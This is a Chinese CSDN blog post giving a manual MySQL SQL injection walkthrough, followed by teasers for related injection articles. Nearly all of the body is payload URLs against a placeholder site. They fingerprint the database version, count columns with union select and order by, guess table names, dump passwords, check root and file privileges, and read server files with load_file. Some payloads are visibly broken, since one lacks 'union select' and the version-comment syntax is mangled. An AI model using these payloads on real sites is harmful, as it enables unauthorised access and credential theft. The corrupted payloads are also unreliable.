MYSQL数据库注入

最新推荐文章于 2024-05-24 15:55:04 发布
最新推荐文章于 2024-05-24 15:55:04 发布
阅读量2.6k 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_37224075/article/details/79309790
版权

例如:注入点 http://www.XX.com/index.asp?id=1

1、库的判断 (版本4以上有联合查询语句union)

1、 http://www.XX.com/index.asp?id=1/*注释
// /*注释符只有mysql数据库用 反应正常则为mysql数据库
2、 http://www.XX.com/index.asp?id=1 and ord(mid(version(),1,1))>51
//51是ascll码 3
3、 http://www.XX.com/index.asp?id=1 and mid(version(),1,1)>3
4、http://www.XX.com/index.asp?id=1/!%20s/ 错误则是MySQL
/!40000%20s/ 错误则版本大于4.0
/!60000%20s/ 正常则版本小于6.0
/!50130%20s/ 错误则版本是5.1.30

2、获得字段数目(使用union需要对字段数目限制(前后sql语句字段数目要相同))

1、 http://www.XX.com/index.asp?id=1 union select 1,1,1
//提交类似语句,不断添加1的个数,直到页面返回正确
2、 http://www.XX.com/index.asp?id=1 order by 10
//order by 后面加数字,mysql会解释成第几列排序,假如提交13返回正确,14错误,那么字段数为13

3、获得表名

1、http://www.XX.com/index.asp?id=1 union select 1,2,3,4,5 from 猜测的表名
//返回页面正确即表名正确,页面上多个地方显示数字

4、获得字段值

1、http://www.XX.com/index.asp?id=1 1,version(),3,4,5 from 已知表名
//相应的字段位置显示版本号,同理:
http://www.XX.com/index.asp?id=1 union select 1,password,3,4,5 from 已知表名 where 主键=N
//得到密码

5、利用load_file()函数读取服务器的内容(需要先判断是否为root权限或有文件读取权限)

1、http://www.XX.com/index.asp?id=1 union select 1,load_file(0x633A2F626F742E696E69),3,4,5 from 表名
//0x633A2F626F742E696E69是c:/boot.ini的16进制表示,可以防止php把/转义掉造成错误

5.1、判断是否为root权限管理员

1、http://www.XX.com/index.asp?id=1 and ord(mid(user(),1,1))=114/*
//返回正常则判断为root,ascll码114是r

5.2判断是否有文件读写权限

2、http://www.XX.com/index.asp?id=1 and (select count(*) from MySQL.user)>0

,,

weixin_37224075
关注
墨者学院-SQL手工注入漏洞测试(MySQL数据库)
多崎巡礼的博客
07-26 3279
此题很简单,可以完全参照 https://blog.csdn.net/qq_42357070/article/details/81215715 进行解题 以下用cms站点举例: https://pan.baidu.com/s/1uiO2cqZCGquQqyYWr0C7WQ     提交and 1=1 返回内容正常        And 1=2 返回内容为空 确定存在注入漏...
mysql数据库注入
weixin_46248422的博客
06-26 786
一、mysql4与5区别 1. MySQL 4版本数据库由于存在着字符转义与不支持字句查询的情况,因此在注入攻击上存在着很大的局限性,只能采用类似Access的方法进行查询猜解。 首先,利用order by获得当前表的字段数,再使用union select联合查询来获取想要的数据库信息。使用union select联合查询数据库时,由于不知道数据库中的表名与字段名,因此只能像Access一样直接用常见表名和字段名进行猜测判断。 2.MySQL 5版本由于information_schema库的存在,注.
MySQL数据库注入方法
谢公子的博客
01-04 6760
目录 MySQL数据库 mysql中比较常用的一些函数 MySQL数据库中的文件操作函数(load_file()、into outfile、intodumpfile) 判断MySQL数据库是否存在SQL注入 MySQL数据库文件结构 MySQL数据库密码破解 MySQL UDF提权 MySQL启动项提权 MySQL数据库 MySQL是一种开放源代码的关系型数据库管理系统(RD...
Mysql注入
天天学安全专属博客
10-28 4462
mysql注入,包括union注入数据库跨库注入,常见的注入绕过方法和数据库文件读写
注入mysql数据库(手工注入
2301_79194110的博客
09-15 385
MySQL 4版本数据库由于存在着字符转义与不支持字句查询的情况,因此在注入攻击上存在着很大的局限性,只能采用类似Access的方法进行查询猜解。首先,利用order by获得当前表的字段数,再使用union select联合查询来获取想要的数据库信息。使用union select联合查询数据库时,由于不知道数据库中的表名与字段名,因此只能像Access一样直接用常见表名和字段名进行猜测判断。MySQL 5版本由于information_schema库的存在,注入攻击相对来说方便了许多。
SQL注入MYSQL注入
av11566的博客
04-19 7221
前言 MYSQL注入中首先要明确当前注入点权限,高权限注入时有更多的攻击手法,有的能直接进行getshell操作。其中也会遇到很多阻碍,相关防御方案也要明确,所谓知己知彼,百战不殆。不论作为攻击还是防御都需要了解其中的手法和原理,这样才是一个合格的安全工作者。 必要知识 在MYSQL5.0以上版本中,MYSQL存在一个自带数据库名为information_schema,它是一个存储记录有所有数据库名,表名,列名的数据库,也相当于可以通过查询它获取指定数据库下面的表名或者列名信息。 数据库中符号"
jmeter 往mysql数据库注入压测数据示例
03-27
jmeter 往mysql数据库注入压测数据示例
C#实现Mysql数据库操作实例(含源码)
02-24
在本文中,我们将深入探讨如何使用C#语言来实现对MySQL数据库的操作。C#是一种广泛应用于Windows和Web应用程序开发的强大编程语言,而MySQL则是一种高效、开源的关系型数据库管理系统。结合两者,我们可以创建功能...
如何使用Java访问Web服务器MySQL数据库
04-04
在开发Java应用程序时,有时我们需要连接到远程Web服务器上的MySQL数据库进行数据操作。这个过程涉及到几个关键步骤和技术,包括理解SQL、使用Java的数据库连接器(JDBC)以及配置数据库连接参数。本篇文章将深入...
MySQL、MSSQL、Oracel、PostgreSQL、Access数据库注入区别
糖小喵
04-21 585
注释符 MySQL: 单行:# 、多行: /**/ SQLServer:单行:-- 多行: /**/ Oracle:单行:-- 多行: /**/ PostgreSQL:单行:-- 多行: /**/ Access:无注释符 数据库端口 MySQL: 3306 SQLServer: 1433 Oracle:1521 PostgreSQL:5432 Acc...
SQL删除注入数据的SQL脚本
07-03
执行此脚本,轻松删除SQL被注入的恶意数据(注意看注释)
Mysql数据库的简单手动注入思路
qq_42042353的博客
10-08 528
mysql5.0注入 首先利用and 1=1 and 1=2 判断是否存在注入点 再利用order by 排序语句判断列数 使用联合查询进行报错操作 在报错的字段上添加一些函数,使其报出后台数据库的一些基本信息,比如database(),user(),version(),@@version_compile_os 等 利用group_concat()使其报出数据库里的所有表 ,()里加table_n...
Mysql注入详细讲解
最新发布
2401_84466359的博客
05-24 1429
*原理:**用户向数据库里存入恶意的数据,在数据被插入到数据库之前,肯定会对数据库进行转义处理,但用户输入的数据的内容肯定是一点摸样也不会变的存进数据库里,而一般都默认为数据库里的信息都是安全的,查询的时候不会进行处理,所以当用户的恶意数据被web程序调用的时候就有可能出发SQL注入。GET/POST提交数据时,发现提交的数据被加密了(可能js加密),那么在提交数据前,抓包,解密,将注入语句写好,然后将整个语句进行加密(相同加密算法),再将数据发过去。HTTP 头注入常常发生在程序采集用户信息的模块中。
Mysql注入_基础
ccz4854的博客
04-27 1434
Mysql注入类型 union 联合查询 布尔盲注 时间盲注 显错注入 堆叠注入 宽字节注入 (只存在PHP) Mysql各类型注入语句 1.union 联合查询(sql查询语句),存在mysql的版本问题 下方是5.0之后版本的利用方式 5.0之后的版本存在 information_schema 表 :information_schema 是 一个虚拟数据库 information_schema数据库类似与“数据字典”,提供了访问数据库元数据的方式,即数据的数据。 如数据库名或表名,列类型,访问权
sql注入(一)
胖虎的博客
11-15 759
WEB漏洞之sql注入 文章目录 前言 dcd一? 二、使用步骤 1.引入库 2.读入数据 总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、常见的数据库类型? Access,Mysql,Mssql,Oracle,Postsql,SQLite,Mongodb 示例:pandas 是基于Nu
网络安全进阶学习第十课——MySQL手工注入
p36273的博客
08-02 2310
多了一列选项,由于正确就会执行sleep(1),所以相应时间最长的那一个就是正确的结果,这里就是14。这样就知道security这个数据库里面所有的表名字:emails,referers,uagents,users。现在这样子就知道了users这个表的所有字段名,假设知道了字段是:id,username,password。好了这样就知道所有的表名字是:emails,referers,uagents,users。,这个函数第二个参数要是有特殊字符是会报错的,这里0x7e是“~”的URL编码。
mysql一次性获取几十万数据_【奇技淫巧】Mysql注入时,猜不到列名,获取所有数据...
weixin_39959482的博客
12-05 392
有时候我们不知道列名,因为不能访问Information_Schema或者其他原因但是我们知道表名,我们可以在不知道列名的情况下dump出该表的全部数据我们有两个表 article、admin方案一select title from article where id = 4 and 0 union SELECT group_concat(a, 0x3a, b) FROM (SELECT ...
Mysql数据库注入-yellowcong
01-21 1392
网站攻击的方式大致有三种:1、通过数据库注入攻击(通过检查工具,来判断数据库中是否存在表,)2、上传攻击,(通过上传webshell的方式,来攻击目标,有伪装图片的,有直接通过Burpsuite这种拦截请求,然后修改上传内容的),3、通过直接暴力破解ssh的地址(这种方式实现起来,需要跑字典的方式,比较的费时间)。 数据库注入原理 # 通过and 来判断 验证是否支持sql注入 an
com. index.php user,www.xx.com/index.php/user/login 打不开
热门推荐
weixin_35190276的博客
03-26 3万+
Array ( [USER] => www [HOME] => /home/www [FCGI_ROLE] => RESPONDER [PATH_INFO] => [GATEWAY_INTERFACE] => CGI/1.1 [SERVER_SOFTWARE] => nginx/1.8.1 [QUERY_STRING] => [REQUEST_METHOD...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值